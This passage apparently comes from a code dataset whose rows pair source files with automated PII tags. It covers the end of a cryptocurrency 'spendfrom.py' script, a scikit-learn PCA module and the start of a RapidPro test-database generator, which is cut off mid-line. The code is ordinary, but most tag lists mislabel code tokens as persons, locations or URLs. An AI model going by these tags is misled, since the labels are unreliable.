options.fromaddresses.split("",""), options.to, amount, fee) + sanity_test_fee(oned, txdata, amount*Decimal(""0.01"")) + if options.dry_run: + print(txdata) + else: + txid = oned.sendrawtransaction(txdata) + print(txid) + +if __name__ == '__main__': + main() +",9912,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'spendfrom.py'], ['NRP', 'spendfrom.py'], ['LOCATION', 'jsonrpc'], ['LOCATION', 'json'], ['PERSON', 'json'], ['PERSON', 'platform.system'], ['PERSON', 'Darwin'], ['PERSON', 'config_parser = SafeConfigParser'], ['NRP', 'address_to_account'], ['LOCATION', 'fromaddresses'], ['PERSON', 'fromaddresses'], ['NRP', 'float(amount'], ['PERSON', 'FeeError(""Rejecting'], ['PERSON', 'FeeError(""Rejecting'], ['PERSON', 'FeeError(""Rejecting'], ['PERSON', 'one.conf'], ['PERSON', 'txdata = create_tx(oned'], ['PERSON', 'options.fromaddresses.split'], ['URL', 'spendfrom.py'], ['URL', 'spendfrom.py'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'one.co'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.fp.re'], ['URL', 's.fi'], ['URL', 's.fi'], ['URL', 'parser.re'], ['URL', 'os.path.jo'], ['URL', 'one.co'], ['URL', 'parser.it'], ['URL', 'config.ge'], ['URL', 'email.com'], ['URL', 'result.ge'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'getpass.ge'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'oned.li'], ['URL', 'oned.li'], ['URL', 'oned.ge'], ['URL', 'account.ge'], ['URL', 'sys.st'], ['URL', 'oned.cr'], ['URL', 'oned.si'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'oned.de'], ['URL', 'sys.st'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'one.co'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'options.am'], ['URL', 'summary.it'], ['URL', 'options.am'], ['URL', 'options.fr'], ['URL', 'options.to'], ['URL', 'oned.se']]" +85,""""""" Principal Component Analysis +"""""" + +# Author: Alexandre Gramfort dummy@email.com +# Olivier Grisel dummy@email.com +# Mathieu Blondel dummy@email.com +# Denis A. Engemann dummy@email.com +# +# License: BSD 3 clause + +from math import log, sqrt +import warnings + +import numpy as np +from scipy import linalg +from scipy.special import gammaln + +from ..base import BaseEstimator, TransformerMixin +from ..utils import array2d, check_random_state, as_float_array +from ..utils import atleast2d_or_csr +from ..utils.extmath import fast_logdet, safe_sparse_dot, randomized_svd, \ + fast_dot + + +def _assess_dimension_(spectrum, rank, n_samples, n_features): + """"""Compute the likelihood of a rank ``rank`` dataset + + The dataset is assumed to be embedded in gaussian noise of shape(n, + dimf) having spectrum ``spectrum``. + + Parameters + ---------- + spectrum: array of shape (n) + data spectrum + rank: int, + tested rank value + n_samples: int, + number of samples + dim: int, + embedding/empirical dimension + + Returns + ------- + ll: float, + The log-likelihood + + Notes + ----- + This implements the method of `Thomas P. Minka: + Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604` + """""" + if rank > len(spectrum): + raise ValueError(""The tested rank cannot exceed the rank of the"" + "" dataset"") + + pu = -rank * log(2.) + for i in range(rank): + pu += (gammaln((n_features - i) / 2.) + - log(np.pi) * (n_features - i) / 2.) + + pl = np.sum(np.log(spectrum[:rank])) + pl = -pl * n_samples / 2. 
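+ + # (A rough gloss of Minka's Laplace approximation, added for readers of + # this code: pu is the log prior over the subspace orientation, pl the + # log-likelihood of the retained eigenvalues; pv, pp and pa below account + # for the discarded-noise variance, the 2*pi normalization constant and + # the log-determinant of the Hessian.)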
+ + if rank == n_features: + pv = 0 + v = 1 + else: + v = np.sum(spectrum[rank:]) / (n_features - rank) + pv = -np.log(v) * n_samples * (n_features - rank) / 2. + + m = n_features * rank - rank * (rank + 1.) / 2. + pp = log(2. * np.pi) * (m + rank + 1.) / 2. + + pa = 0. + spectrum_ = spectrum.copy() + spectrum_[rank:n_features] = v + for i in range(rank): + for j in range(i + 1, len(spectrum)): + pa += log((spectrum[i] - spectrum[j]) * + (1. / spectrum_[j] - 1. / spectrum_[i])) + log(n_samples) + + ll = pu + pl + pv + pp - pa / 2. - rank * log(n_samples) / 2. + + return ll + + +def _infer_dimension_(spectrum, n_samples, n_features): + """"""Infers the dimension of a dataset of shape (n_samples, n_features) + + The dataset is described by its spectrum `spectrum`. + """""" + n_spectrum = len(spectrum) + ll = np.empty(n_spectrum) + for rank in range(n_spectrum): + ll[rank] = _assess_dimension_(spectrum, rank, n_samples, n_features) + return ll.argmax() + + +class PCA(BaseEstimator, TransformerMixin): + """"""Principal component analysis (PCA) + + Linear dimensionality reduction using Singular Value Decomposition of the + data and keeping only the most significant singular vectors to project the + data to a lower dimensional space. + + This implementation uses the scipy.linalg implementation of the singular + value decomposition. It only works for dense arrays and is not scalable to + large dimensional data. + + The time complexity of this implementation is ``O(n ** 3)`` assuming + n ~ n_samples ~ n_features. + + Parameters + ---------- + n_components : int, None or string + Number of components to keep. + if n_components is not set all components are kept:: + + n_components == min(n_samples, n_features) + + if n_components == 'mle', Minka\'s MLE is used to guess the dimension + if ``0 < n_components < 1``, select the number of components such that + the amount of variance that needs to be explained is greater than the + percentage specified by n_components + + copy : bool + If False, data passed to fit are overwritten and running + fit(X).transform(X) will not yield the expected results, + use fit_transform(X) instead. + + whiten : bool, optional + When True (False by default) the `components_` vectors are divided + by the singular values and scaled by sqrt(n_samples) to ensure + uncorrelated outputs with unit component-wise variances. + + Whitening will remove some information from the transformed signal + (the relative variance scales of the components) but can sometimes + improve the predictive accuracy of the downstream estimators by + making their data respect some hard-wired assumptions. + + Attributes + ---------- + `components_` : array, [n_components, n_features] + Components with maximum variance. + + `explained_variance_ratio_` : array, [n_components] + Percentage of variance explained by each of the selected components. \ + If n_components is not set then all components are stored and the sum \ + of explained variances is equal to 1.0 + + `n_components_` : int + The estimated number of components. Relevant when n_components is set + to 'mle' or a number between 0 and 1 to select using explained + variance. + + Notes + ----- + For n_components='mle', this class uses the method of `Thomas P. Minka: + Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604` + + Due to implementation subtleties of the Singular Value Decomposition (SVD), + which is used in this implementation, running fit twice on the same matrix + can lead to principal components with signs flipped (change in direction). 
+ For this reason, it is important to always use the same estimator object to + transform data in a consistent fashion. + + Examples + -------- + + >>> import numpy as np + >>> from sklearn.decomposition import PCA + >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]]) + >>> pca = PCA(n_components=2) + >>> pca.fit(X) + PCA(copy=True, n_components=2, whiten=False) + >>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS + [ 0.99244... 0.00755...] + + See also + -------- + ProbabilisticPCA + RandomizedPCA + KernelPCA + SparsePCA + TruncatedSVD + """""" + def __init__(self, n_components=None, copy=True, whiten=False): + self.n_components = n_components + self.copy = copy + self.whiten = whiten + + def fit(self, X, y=None): + """"""Fit the model with X. + + Parameters + ---------- + X: array-like, shape (n_samples, n_features) + Training data, where n_samples is the number of samples + and n_features is the number of features. + + Returns + ------- + self : object + Returns the instance itself. + """""" + self._fit(X) + return self + + def fit_transform(self, X, y=None): + """"""Fit the model with X and apply the dimensionality reduction on X. + + Parameters + ---------- + X : array-like, shape (n_samples, n_features) + Training data, where n_samples is the number of samples + and n_features is the number of features. + + Returns + ------- + X_new : array-like, shape (n_samples, n_components) + + """""" + U, S, V = self._fit(X) + U = U[:, :self.n_components_] + + if self.whiten: + # X_new = X * V / S * sqrt(n_samples) = U * sqrt(n_samples) + U *= sqrt(X.shape[0]) + else: + # X_new = X * V = U * S * V^T * V = U * S + U *= S[:self.n_components_] + + return U + + def _fit(self, X): + """""" Fit the model on X + + Parameters + ---------- + X: array-like, shape (n_samples, n_features) + Training vector, where n_samples is the number of samples and + n_features is the number of features. + + Returns + ------- + U, s, V : ndarrays + The SVD of the input data, copied and centered when + requested. + """""" + X = array2d(X) + n_samples, n_features = X.shape + X = as_float_array(X, copy=self.copy) + # Center data + self.mean_ = np.mean(X, axis=0) + X -= self.mean_ + U, S, V = linalg.svd(X, full_matrices=False) + self.explained_variance_ = (S ** 2) / n_samples + self.explained_variance_ratio_ = (self.explained_variance_ / + self.explained_variance_.sum()) + + if self.whiten: + self.components_ = V / S[:, np.newaxis] * sqrt(n_samples) + else: + self.components_ = V + + n_components = self.n_components + if n_components is None: + n_components = n_features + elif n_components == 'mle': + if n_samples < n_features: + raise ValueError(""n_components='mle' is only supported "" + ""if n_samples >= n_features"") + n_components = _infer_dimension_(self.explained_variance_, + n_samples, n_features) + + if 0 < n_components < 1.0: + # number of components for which the cumulated explained variance + # percentage is superior to the desired threshold + ratio_cumsum = self.explained_variance_ratio_.cumsum() + n_components = np.sum(ratio_cumsum < n_components) + 1 + + self.components_ = self.components_[:n_components, :] + self.explained_variance_ = \ + self.explained_variance_[:n_components] + self.explained_variance_ratio_ = \ + self.explained_variance_ratio_[:n_components] + + self.n_components_ = n_components + return (U, S, V) + + def transform(self, X): + """"""Apply the dimensionality reduction on X. 
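+ + Informally, this centers X with the stored mean and projects it onto + the principal axes, i.e. roughly:: + + X_new = np.dot(X - self.mean_, self.components_.T)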
+ + Parameters + ---------- + X : array-like, shape (n_samples, n_features) + New data, where n_samples is the number of samples + and n_features is the number of features. + + Returns + ------- + X_new : array-like, shape (n_samples, n_components) + + """""" + X = array2d(X) + if self.mean_ is not None: + X = X - self.mean_ + X_transformed = fast_dot(X, self.components_.T) + return X_transformed + + def inverse_transform(self, X): + """"""Transform data back to its original space, i.e., + return an input X_original whose transform would be X + + Parameters + ---------- + X : array-like, shape (n_samples, n_components) + New data, where n_samples is the number of samples + and n_components is the number of components. + + Returns + ------- + X_original : array-like, shape (n_samples, n_features) + + Notes + ----- + If whitening is enabled, inverse_transform does not compute the + exact inverse operation of transform. + """""" + return fast_dot(X, self.components_) + self.mean_ + + +class ProbabilisticPCA(PCA): + """"""Additional layer on top of PCA that adds a probabilistic evaluation"""""" + __doc__ += PCA.__doc__ + + def fit(self, X, y=None, homoscedastic=True): + """"""In addition to PCA.fit, learns a covariance model + + Parameters + ---------- + X : array of shape(n_samples, n_features) + The data to fit + + homoscedastic : bool, optional, + If True, average variance across remaining dimensions + """""" + PCA.fit(self, X) + n_samples, n_features = X.shape + self._dim = n_features + Xr = X - self.mean_ + Xr -= np.dot(np.dot(Xr, self.components_.T), self.components_) + + n_components = self.n_components + if n_components is None: + n_components = n_features + + # Make the low rank part of the estimated covariance + self.covariance_ = np.dot(self.components_[:n_components].T * + self.explained_variance_[:n_components], + self.components_[:n_components]) + + if n_features == n_components: + delta = 0. + elif homoscedastic: + delta = (Xr ** 2).sum() / (n_samples * n_features) + else: + delta = (Xr ** 2).mean(axis=0) / (n_features - n_components) + + # Add delta to the diagonal without extra allocation + self.covariance_.flat[::n_features + 1] += delta + + return self + + def score(self, X, y=None): + """"""Return a score associated with new data + + Parameters + ---------- + X: array of shape(n_samples, n_features) + The data to test + + Returns + ------- + ll: array of shape (n_samples), + log-likelihood of each row of X under the current model + """""" + Xr = X - self.mean_ + n_features = X.shape[1] + self.precision_ = linalg.inv(self.covariance_) + log_like = -.5 * (Xr * (np.dot(Xr, self.precision_))).sum(axis=1) + log_like -= .5 * (fast_logdet(self.covariance_) + + n_features * log(2. * np.pi)) + return log_like + + +class RandomizedPCA(BaseEstimator, TransformerMixin): + """"""Principal component analysis (PCA) using randomized SVD + + Linear dimensionality reduction using approximated Singular Value + Decomposition of the data and keeping only the most significant + singular vectors to project the data to a lower dimensional space. + + Parameters + ---------- + n_components : int, optional + Maximum number of components to keep. When not given or None, this + is set to n_features (the second dimension of the training data). + + copy : bool + If False, data passed to fit are overwritten and running + fit(X).transform(X) will not yield the expected results, + use fit_transform(X) instead. 
+ + iterated_power : int, optional + Number of iterations for the power method. 3 by default. + + whiten : bool, optional + When True (False by default) the `components_` vectors are divided + by the singular values to ensure uncorrelated outputs with unit + component-wise variances. + + Whitening will remove some information from the transformed signal + (the relative variance scales of the components) but can sometimes + improve the predictive accuracy of the downstream estimators by + making their data respect some hard-wired assumptions. + + random_state : int or RandomState instance or None (default) + Pseudo Random Number generator seed control. If None, use the + numpy.random singleton. + + Attributes + ---------- + `components_` : array, [n_components, n_features] + Components with maximum variance. + + `explained_variance_ratio_` : array, [n_components] + Percentage of variance explained by each of the selected components. \ + If n_components is not set then all components are stored and the sum \ + of explained variances is equal to 1.0 + + Examples + -------- + >>> import numpy as np + >>> from sklearn.decomposition import RandomizedPCA + >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]]) + >>> pca = RandomizedPCA(n_components=2) + >>> pca.fit(X) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE + RandomizedPCA(copy=True, iterated_power=3, n_components=2, + random_state=None, whiten=False) + >>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS + [ 0.99244... 0.00755...] + + See also + -------- + PCA + ProbabilisticPCA + TruncatedSVD + + References + ---------- + + .. [Halko2009] `Finding structure with randomness: Stochastic algorithms + for constructing approximate matrix decompositions Halko, et al., 2009 + (arXiv:0909.4061)` + + .. [MRT] `A randomized algorithm for the decomposition of matrices + Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert` + + Notes + ----- + This class supports sparse matrix input for backward compatibility, but + actually computes a truncated SVD instead of a PCA in that case (i.e. no + centering is performed). This support is deprecated; use the class + TruncatedSVD for sparse matrix support. + + """""" + + def __init__(self, n_components=None, copy=True, iterated_power=3, + whiten=False, random_state=None): + self.n_components = n_components + self.copy = copy + self.iterated_power = iterated_power + self.whiten = whiten + self.mean_ = None + self.random_state = random_state + + def fit(self, X, y=None): + """"""Fit the model with X. + + Parameters + ---------- + X: array-like, shape (n_samples, n_features) + Training data, where n_samples is the number of samples + and n_features is the number of features. + + Returns + ------- + self : object + Returns the instance itself. + """""" + self._fit(X) + return self + + def _fit(self, X): + """"""Fit the model to the data X. + + Parameters + ---------- + X: array-like, shape (n_samples, n_features) + Training vector, where n_samples is the number of samples and + n_features is the number of features. + + Returns + ------- + X : ndarray, shape (n_samples, n_features) + The input data, copied, centered and whitened when requested. 
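+ + (Note that whitening is realised by rescaling ``components_`` rather + than the returned array, and that no centering is applied on the + deprecated sparse-input path; see the code below.)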
+ """""" + random_state = check_random_state(self.random_state) + if hasattr(X, 'todense'): + warnings.warn(""Sparse matrix support is deprecated"" + "" and will be dropped in 0.16."" + "" Use TruncatedSVD instead."", + DeprecationWarning) + else: + # not a sparse matrix, ensure this is a 2D array + X = np.atleast_2d(as_float_array(X, copy=self.copy)) + + n_samples = X.shape[0] + + if not hasattr(X, 'todense'): + # Center data + self.mean_ = np.mean(X, axis=0) + X -= self.mean_ + if self.n_components is None: + n_components = X.shape[1] + else: + n_components = self.n_components + + U, S, V = randomized_svd(X, n_components, + n_iter=self.iterated_power, + random_state=random_state) + + self.explained_variance_ = exp_var = (S ** 2) / n_samples + self.explained_variance_ratio_ = exp_var / exp_var.sum() + + if self.whiten: + self.components_ = V / S[:, np.newaxis] * sqrt(n_samples) + else: + self.components_ = V + + return X + + def transform(self, X, y=None): + """"""Apply dimensionality reduction on X. + + Parameters + ---------- + X : array-like, shape (n_samples, n_features) + New data, where n_samples in the number of samples + and n_features is the number of features. + + Returns + ------- + X_new : array-like, shape (n_samples, n_components) + + """""" + # XXX remove scipy.sparse support here in 0.16 + X = atleast2d_or_csr(X) + if self.mean_ is not None: + X = X - self.mean_ + + X = safe_sparse_dot(X, self.components_.T) + return X + + def fit_transform(self, X, y=None): + """"""Apply dimensionality reduction on X. + + Parameters + ---------- + X : array-like, shape (n_samples, n_features) + New data, where n_samples in the number of samples + and n_features is the number of features. + + Returns + ------- + X_new : array-like, shape (n_samples, n_components) + + """""" + X = self._fit(atleast2d_or_csr(X)) + X = safe_sparse_dot(X, self.components_.T) + return X + + def inverse_transform(self, X, y=None): + """"""Transform data back to its original space. + + Returns an array X_original whose transform would be X. + + Parameters + ---------- + X : array-like, shape (n_samples, n_components) + New data, where n_samples in the number of samples + and n_components is the number of components. + + Returns + ------- + X_original array-like, shape (n_samples, n_features) + + Notes + ----- + If whitening is enabled, inverse_transform does not compute the + exact inverse operation of transform. + """""" + # XXX remove scipy.sparse support here in 0.16 + X_original = safe_sparse_dot(X, self.components_) + if self.mean_ is not None: + X_original = X_original + self.mean_ + return X_original +",20495,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Alexandre Gramfort'], ['PERSON', 'Olivier Grisel'], ['LOCATION', 'n_samples'], ['PERSON', 'Thomas P. Minka'], ['LOCATION', 'log(2'], ['LOCATION', 'log(2'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['PERSON', 'n_components'], ['PERSON', 'Thomas P. 
Minka'], ['NRP', 'self.copy'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'log(2'], ['LOCATION', 'n_components'], ['DATE_TIME', '2009'], ['PERSON', 'Gunnar Martinsson'], ['PERSON', 'Vladimir Rokhlin'], ['PERSON', 'Mark Tygert'], ['NRP', 'self.copy'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'todense'], ['LOCATION', 'n_samples'], ['PERSON', 'todense'], ['LOCATION', 'randomized_svd(X'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['IP_ADDRESS', '\n\n '], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', '..ba'], ['URL', 'np.su'], ['URL', 'np.su'], ['URL', 'spectrum.co'], ['URL', 'll.ar'], ['URL', 'scipy.li'], ['URL', 'sklearn.de'], ['URL', 'np.ar'], ['URL', 'pca.fi'], ['URL', 'self.co'], ['URL', 'X.sh'], ['URL', 'X.sh'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'np.me'], ['URL', 'self.me'], ['URL', 'linalg.sv'], ['URL', 'self.com'], ['URL', 'np.ne'], ['URL', 'self.com'], ['URL', 'np.su'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'PCA.fi'], ['URL', 'PCA.fi'], ['URL', 'X.sh'], ['URL', 'self.me'], ['URL', 'np.do'], ['URL', 'np.do'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.co'], ['URL', 'np.do'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'X.sh'], ['URL', 'X.sh'], ['URL', 'self.pr'], ['URL', 'linalg.in'], ['URL', 'self.co'], ['URL', 'np.do'], ['URL', 'self.pr'], ['URL', 'self.co'], ['URL', 'sklearn.de'], ['URL', 'np.ar'], ['URL', 'pca.fi'], ['URL', 'self.co'], ['URL', 'self.it'], ['URL', 'self.me'], ['URL', 'np.at'], ['URL', 'self.co'], ['URL', 'X.sh'], ['URL', 'self.me'], ['URL', 'np.me'], ['URL', 'self.me'], ['URL', 'X.sh'], ['URL', 'self.it'], ['URL', 'var.su'], ['URL', 'self.com'], ['URL', 'np.ne'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me']]" +86,"from __future__ import unicode_literals, division, print_function + +import json +import math +import pytz +import random +import resource +import six +import sys +import time +import uuid + +from collections import defaultdict +from datetime import timedelta +from django.conf import settings +from django.contrib.auth.models import User +from django.core.management import BaseCommand, CommandError +from 
django.core.management.base import CommandParser +from django.db import connection, transaction +from django.utils import timezone +from django_redis import get_redis_connection +from subprocess import check_call, CalledProcessError +from temba.channels.models import Channel +from temba.channels.tasks import squash_channelcounts +from temba.contacts.models import Contact, ContactField, ContactGroup, ContactURN, ContactGroupCount, URN, TEL_SCHEME, TWITTER_SCHEME +from temba.flows.models import FlowStart, FlowRun +from temba.flows.tasks import squash_flowpathcounts, squash_flowruncounts, prune_recentmessages +from temba.locations.models import AdminBoundary +from temba.msgs.models import Label, Msg +from temba.msgs.tasks import squash_labelcounts +from temba.orgs.models import Org +from temba.orgs.tasks import squash_topupcredits +from temba.utils import chunk_list, ms_to_datetime, datetime_to_str, datetime_to_ms +from temba.values.models import Value + + +# maximum age in days of database content +CONTENT_AGE = 3 * 365 + +# every user will have this password including the superuser +USER_PASSWORD = ""Qwerty123"" + +# database dump containing admin boundary records +LOCATIONS_DUMP = 'test-data/nigeria.bin' + +# organization names are generated from these components +ORG_NAMES = ( + (""UNICEF"", ""WHO"", ""WFP"", ""UNESCO"", ""UNHCR"", ""UNITAR"", ""FAO"", ""UNEP"", ""UNAIDS"", ""UNDAF""), + (""Nigeria"", ""Chile"", ""Indonesia"", ""Rwanda"", ""Mexico"", ""Zambia"", ""India"", ""Brazil"", ""Sudan"", ""Mozambique"") +) + +# the users, channels, groups, labels and fields to create for each organization +USERS = ( + {'username': ""admin%d"", 'email': dummy@email.com"", 'role': 'administrators'}, + {'username': ""editor%d"", 'email': dummy@email.com"", 'role': 'editors'}, + {'username': ""viewer%d"", 'email': dummy@email.com"", 'role': 'viewers'}, + {'username': ""surveyor%d"", 'email': dummy@email.com"", 'role': 'surveyors'}, +) +CHANNELS = ( + {'name': ""Android"", 'channel_type': Channel.TYPE_ANDROID, 'scheme': 'tel', 'address': ""1234""}, + {'name': ""Nexmo"", 'channel_type': Channel.TYPE_NEXMO, 'scheme': 'tel', 'address': ""2345""}, + {'name': ""Twitter"", 'channel_type': 'TT', 'scheme': 'twitter', 'address': ""my_handle""}, +) +FIELDS = ( + {'key': 'gender', 'label': ""Gender"", 'value_type': Value.TYPE_TEXT}, + {'key': 'age', 'label': ""Age"", 'value_type': Value.TYPE_DECIMAL}, + {'key': 'joined', 'label': ""Joined On"", 'value_type': Value.TYPE_DATETIME}, + {'key': 'ward', 'label': ""Ward"", 'value_type': Value.TYPE_WARD}, + {'key': 'district', 'label': ""District"", 'value_type': Value.TYPE_DISTRICT}, + {'key': 'state', 'label': ""State"", 'value_type': Value.TYPE_STATE}, +) +GROUPS = ( + {'name': ""Reporters"", 'query': None, 'member': 0.95}, # member is either a probability or callable + {'name': ""Farmers"", 'query': None, 'member': 0.5}, + {'name': ""Doctors"", 'query': None, 'member': 0.4}, + {'name': ""Teachers"", 'query': None, 'member': 0.3}, + {'name': ""Drivers"", 'query': None, 'member': 0.2}, + {'name': ""Testers"", 'query': None, 'member': 0.1}, + {'name': ""Empty"", 'query': None, 'member': 0.0}, + {'name': ""Youth (Dynamic)"", 'query': 'age <= 18', 'member': lambda c: c['age'] and c['age'] <= 18}, + {'name': ""Unregistered (Dynamic)"", 'query': 'joined = """"', 'member': lambda c: not c['joined']}, + {'name': ""Districts (Dynamic)"", 'query': 'district=Faskari or district=Zuru or district=Anka', + 'member': lambda c: c['district'] and c['district'].name in (""Faskari"", 
""Zuru"", ""Anka"")}, +) +LABELS = (""Reporting"", ""Testing"", ""Youth"", ""Farming"", ""Health"", ""Education"", ""Trade"", ""Driving"", ""Building"", ""Spam"") +FLOWS = ( + {'name': ""Favorites"", 'file': ""favorites.json"", 'templates': ( + [""blue"", ""mutzig"", ""bob""], + [""orange"", ""green"", ""primus"", ""jeb""], + )}, + {'name': ""SMS Form"", 'file': ""sms_form.json"", 'templates': ([""22 F Seattle""], [""35 M MIAMI""])}, + {'name': ""Pick a Number"", 'file': ""pick_a_number.json"", 'templates': ([""1""], [""4""], [""5""], [""7""], [""8""])} +) + +# contact names are generated from these components +CONTACT_NAMES = ( + ("""", ""Anne"", ""Bob"", ""Cathy"", ""Dave"", ""Evan"", ""Freda"", ""George"", ""Hallie"", ""Igor""), + ("""", ""Jameson"", ""Kardashian"", ""Lopez"", ""Mooney"", ""Newman"", ""O'Shea"", ""Poots"", ""Quincy"", ""Roberts""), +) +CONTACT_LANGS = (None, ""eng"", ""fre"", ""spa"", ""kin"") +CONTACT_HAS_TEL_PROB = 0.9 # 9/10 contacts have a phone number +CONTACT_HAS_TWITTER_PROB = 0.1 # 1/10 contacts have a twitter handle +CONTACT_IS_STOPPED_PROB = 0.01 # 1/100 contacts are stopped +CONTACT_IS_BLOCKED_PROB = 0.01 # 1/100 contacts are blocked +CONTACT_IS_DELETED_PROB = 0.005 # 1/200 contacts are deleted +CONTACT_HAS_FIELD_PROB = 0.8 # 8/10 fields set for each contact + +RUN_RESPONSE_PROB = 0.1 # 1/10 runs will be responded to +INBOX_MESSAGES = ((""What is"", ""I like"", ""No""), (""beer"", ""tea"", ""coffee""), (""thank you"", ""please"", ""today"")) + + +class Command(BaseCommand): + COMMAND_GENERATE = 'generate' + COMMAND_SIMULATE = 'simulate' + + help = ""Generates a database suitable for performance testing"" + + def add_arguments(self, parser): + cmd = self + subparsers = parser.add_subparsers(dest='command', help='Command to perform', + parser_class=lambda **kw: CommandParser(cmd, **kw)) + + gen_parser = subparsers.add_parser('generate', help='Generates a clean testing database') + gen_parser.add_argument('--orgs', type=int, action='store', dest='num_orgs', default=100) + gen_parser.add_argument('--contacts', type=int, action='store', dest='num_contacts', default=1000000) + gen_parser.add_argument('--seed', type=int, action='store', dest='seed', default=None) + + sim_parser = subparsers.add_parser('simulate', help='Simulates activity on an existing database') + sim_parser.add_argument('--runs', type=int, action='store', dest='num_runs', default=500) + + def handle(self, command, *args, **kwargs): + start = time.time() + + if command == self.COMMAND_GENERATE: + self.handle_generate(kwargs['num_orgs'], kwargs['num_contacts'], kwargs['seed']) + else: + self.handle_simulate(kwargs['num_runs']) + + time_taken = time.time() - start + self._log(""Completed in %d secs, peak memory usage: %d MiB\n"" % (int(time_taken), int(self.peak_memory()))) + + def handle_generate(self, num_orgs, num_contacts, seed): + """""" + Creates a clean database + """""" + seed = self.configure_random(num_orgs, seed) + + self._log(""Generating random base database (seed=%d)...\n"" % seed) + + try: + has_data = Org.objects.exists() + except Exception: # pragma: no cover + raise CommandError(""Run migrate command first to create database tables"") + if has_data: + raise CommandError(""Can't generate content in non-empty database."") + + self.batch_size = 5000 + + # the timespan being modelled by this database + self.db_ends_on = timezone.now() + self.db_begins_on = self.db_ends_on - timedelta(days=CONTENT_AGE) + + # this is a new database so clear out redis + self._log(""Clearing out Redis 
cache... "") + r = get_redis_connection() + r.flushdb() + self._log(self.style.SUCCESS(""OK"") + '\n') + + superuser = User.objects.create_superuser(""root"", dummy@email.com"", USER_PASSWORD) + + country, locations = self.load_locations(LOCATIONS_DUMP) + orgs = self.create_orgs(superuser, country, num_orgs) + self.create_users(orgs) + self.create_channels(orgs) + self.create_fields(orgs) + self.create_groups(orgs) + self.create_labels(orgs) + self.create_flows(orgs) + self.create_contacts(orgs, locations, num_contacts) + + def handle_simulate(self, num_runs): + """""" + Prepares to resume simulating flow activity on an existing database + """""" + self._log(""Resuming flow activity simulation on existing database...\n"") + + orgs = list(Org.objects.order_by('id')) + if not orgs: + raise CommandError(""Can't simulate activity on an empty database"") + + self.configure_random(len(orgs)) + + # in real life Nexmo messages are throttled, but that's not necessary for this simulation + del Channel.CHANNEL_SETTINGS[Channel.TYPE_NEXMO]['max_tps'] + + inputs_by_flow_name = {f['name']: f['templates'] for f in FLOWS} + + self._log(""Preparing existing orgs... "") + + for org in orgs: + flows = list(org.flows.order_by('id')) + for flow in flows: + flow.input_templates = inputs_by_flow_name[flow.name] + + org.cache = { + 'users': list(org.get_org_users().order_by('id')), + 'channels': list(org.channels.order_by('id')), + 'groups': list(ContactGroup.user_groups.filter(org=org).order_by('id')), + 'flows': flows, + 'contacts': list(org.org_contacts.values_list('id', flat=True)), # only ids to save memory + 'activity': None + } + + self._log(self.style.SUCCESS(""OK"") + '\n') + + self.simulate_activity(orgs, num_runs) + + def configure_random(self, num_orgs, seed=None): + if not seed: + seed = random.randrange(0, 65536) + + self.random = random.Random(seed) + + # monkey patch uuid4 so it returns the same 